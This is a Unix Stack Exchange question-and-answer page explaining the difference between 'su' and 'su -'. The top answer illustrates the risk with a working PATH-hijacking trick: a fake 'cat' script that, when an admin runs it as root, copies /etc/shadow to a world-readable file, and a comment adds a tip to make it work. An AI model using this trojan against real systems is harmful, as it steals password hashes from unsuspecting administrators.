212

I don't understand why su - is preferred over su to login as root.

Coren
  • 4,970
  • 1
  • 24
  • 43
Dharmit
  • 4,220
  • 7
  • 28
  • 37

4 Answers4

281

su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.

su just switches the user, providing a normal shell with an environment nearly the same as with the old user.

Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.

$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0

$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"

Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work! 

$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!

If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:

$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit

Wow! Thanks, super admin!

$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy

He, he.

You maybe noticed that the corrupted $PATH variable was not reset. This wouldn't have happened, if the admin invoked su - instead.

Seldom 'Where's Monica' Needy
  • 142
  • 7
wag
  • 35,104
  • 11
  • 66
  • 51
  • 3
    Don't forget to set an `umask` like 000 or it won't work. – Lekensteyn Oct 22 '11 at 08:48
  • Also worth knowing, although not an answer: There is also `su --`, which behaves like `su -`, but does not change the current directory. – Simon Richter Feb 07 '11 at 12:25
  • I'm embarrassed to say that with years of experience I didn't know about `su --`. That's really useful and I'm going to start using it today. Thanks – Michael Feb 07 '11 at 13:55
  • 15
    `su --` is the same as `su`. – Mikel Feb 07 '11 at 20:08
  • 15
    -- is a flag that most programs interpret as "nothing after this should be taken as a flag". Useful for greping for things which start with a dash. – David Mackintosh Feb 09 '11 at 04:43
  • 14
    One could as well just put a `su` file inside the PATH. It's not so hard to mimic the behavior of the real `su`. The super-user has been careless anyway :-) – Stéphane Gimenez Feb 28 '12 at 18:53
  • 13
    `su --` is NOT the same as `su -` : `--` tells an getopt(s) (or similar) option handler to stop processing the command line for further options (usefull for example if the rest contains filenames which could start with an '-'). Ie, in "rm -i -- -f" : -f is then treated as a regular argument, so here as the *name of the file* to `rm -i`, and *not* as an additionnal `-f`option to the `rm` command. So `su --` is just `su` and not `su -` ! So `su --` would be as unsafe to the (funny and instructive) example givan by wag. Use `su -`. – Olivier Dulac Dec 26 '12 at 15:05
  • The security example is clever, but are there are real security problems if I `ssh` into a remote server? Because I can't really think of any... – Martin Tournoij Mar 09 '16 at 14:56
  • @OlivierDulac - Could you please point me to some resource on what the `-` does in general? Say it is appended to something else than `su`. For context, I am trying to understand what does this command do: `xauth -f $XAUTH nmerge -`. Thanks a lot. – Matteo Sep 13 '20 at 17:11
  • @Matteo Always look at the man pages. On several commands (tar, awk, and some others), `-` could mean stdin, and for others it could mean something else (ex: su). Man pages are your friend ^^ – Olivier Dulac Sep 13 '20 at 17:48
  • @OlivierDulac - Thanks for the super quick reply. I looked at the man page for [xauth](https://www.x.org/archive/X11R6.8.1/doc/xauth.1.html) before commenting but it doesn't explain what `-` is for. How could I figure it out? I posted a question about my problem (https://unix.stackexchange.com/questions/609255/xauthority-for-gui-in-a-docker-container) if you are able to help! thanks! – Matteo Sep 13 '20 at 18:00
39

su - logs you in completely as root, whereas su makes it so you are pretending to be root.

The most obvious example of this is that ~ is root's home directory if you use su -, but your own home directory if you use su.

Depending on your system, it may also mean differences in prompt, PATH, or history file.

So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.

On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.

Also don't forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.

Mikel
  • 56,387
  • 13
  • 130
  • 149
  • 1
    when I "su" I get ~ and $HOME both evaluating to /root. Is the behavior you describe specific to certain shells or OS versions or something? It's my understanding that ~ can be expanded by the kernel. I've got zsh as my (and root's) shell. – JasonWoof Feb 08 '11 at 00:05
  • Your `.bashrc` or `/etc/bashrc` or `/etc/profile.d` scripts are setting `PATH`. Look for `if [ $UID -eq 0 ]` or something like that. – Mikel Feb 08 '11 at 01:14
  • `$USER` for example is left unchanged. – peterph Jan 30 '14 at 11:13
  • 1
    What about `sudo su`? – Simon Kuang Jul 18 '14 at 20:10
  • 1
    Your example does not work for me. I get the same directory resolved in either way. – Daniel W. Apr 18 '16 at 14:45
  • `$HOME` is the same but `pwd` is different... – DJCrashdummy Jul 28 '17 at 23:51
  • @Mikel - Could you please point me to some resource on what the `-` does in general? Say it is appended to something else than `su`. For context, I am trying to understand what does this command do: `xauth -f $XAUTH nmerge -`. Thanks a lot. – Matteo Sep 13 '20 at 17:12
5

The main difference is :

su - username sets up the shell environment as if it were a clean login as the specified user, it access and use specified users environment variables,

su username just starts a shell with current environment settings for the specified user.

If username is not specified with su and su -, the root account is implied as default.

Hauke Laging
  • 88,146
  • 18
  • 125
  • 174
Akhil MK
  • 51
  • 1
  • 1
3

I use su -- when I'm in a directory as a regular user but want to switch to root and remain in same directory after the switch. When you use su - it switches the user to root and also takes you to /root which is the root home directory.

Calvin Dike
  • 31
  • 3